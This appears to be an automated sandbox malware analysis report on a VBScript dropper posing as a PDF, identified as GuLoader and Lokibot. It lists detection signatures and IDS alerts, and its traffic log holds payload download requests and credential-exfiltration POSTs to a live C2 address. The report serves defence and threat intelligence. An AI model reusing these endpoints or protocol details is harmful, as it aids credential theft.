Windows Analysis Report
Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs

Overview

General Information

Sample name:	Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs renamed because original name is a hash value
Original sample name:	Ajnlatkrs 09-30-2024pdf.vbs
Analysis ID:	1523162
MD5:	34273527e12e172917598d0e29994432
SHA1:	d390fd4b4ffc45be0a7cf05765af19e402377640
SHA256:	2c2a57b3a137d49c53bf35a36a7136a78d67fcaa16b8f352a6b46a457d691815
Tags:	Lokivbsuser-abuse_ch
Infos:

Detection

GuLoader, Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Suricata IDS alerts for network traffic

VBScript performs obfuscated calls to suspicious functions

Yara detected GuLoader

Yara detected Lokibot

Yara detected Powershell download and execute

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sleep loop found (likely to delay execution)

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Signatures

AV Detection

Multi AV Scanner detection for domain / URL

Source: http://137.184.191.215/index.php/10899

Virustotal: Detection: 10%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown	HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.5:65310 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:65312 version: TLS 1.2

Source:	Binary string: ore.pdb source: powershell.exe, 00000004.00000002.3052757147.0000000007665000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdb source: powershell.exe, 00000004.00000002.3052757147.0000000007665000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.3031770631.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dxdiag.pdbGCTL source: 31437F.exe.20.dr
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.3052757147.00000000076AB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dxdiag.pdb source: 31437F.exe.20.dr

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65317 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65318 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65318 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65324 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65324 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65339 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65339 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65318 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65318 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65323 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65323 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65321 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65328 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65332 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65332 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65320 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65319 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65319 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65316 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65324 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65321 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65339 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65323 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65339 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65329 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65320 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65342 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65321 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65321 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65315 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65315 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65330 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65316 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65330 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65324 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65319 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65319 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65320 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65320 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65328 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65330 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65330 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65328 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65332 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65329 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65332 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65313 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65316 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65313 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65317 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65329 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65340 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65323 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:65313 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65340 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65328 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65325 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65316 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65315 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65315 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65338 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65342 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65338 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65325 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65322 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65338 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65325 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65325 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65338 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65342 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65342 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65340 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65340 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65314 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65317 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65317 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65331 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65331 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65322 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65329 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65322 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65322 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65326 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65326 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65336 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65336 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65326 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65326 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65327 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65336 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65327 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65314 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65336 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:65314 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65327 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65327 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65331 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65331 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65334 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65341 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65341 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65337 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65337 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65334 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65341 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65341 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65337 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65337 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65333 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65333 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65333 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65333 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65335 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65335 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65335 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65335 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65334 -> 137.184.191.215:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65334 -> 137.184.191.215:80

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 137.184.191.215 137.184.191.215

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: PANDGUS PANDGUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:65310 -> 216.58.206.46:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 180Connection: close
